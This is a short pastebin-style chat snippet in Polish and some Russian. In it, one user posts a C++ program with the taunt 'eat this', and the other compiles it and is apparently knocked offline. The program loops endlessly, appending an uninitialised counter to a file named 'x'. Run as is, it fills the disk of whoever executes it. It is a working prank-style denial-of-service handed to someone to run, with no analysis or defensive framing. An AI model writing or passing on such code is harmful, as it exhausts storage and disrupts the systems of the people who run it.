Anonim / 5 years, 5 months ago | Download | Plaintext | Odpowiedz |

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
Matan: //eat this
#include<fstream>
#include<string>
using namespace std;
int main()
{
    unsigned int i;
    while(1)
    {
        i++;
        ofstream f;
        f.open("x",ios::app);
        f<<i;
        f.close();
    }
return 0;
}
Keton: szto eto, zaraz skompiluję te twoje ścierwo
[User Keton lost the connection.]
[User Keton is connected.]
Keton: dobre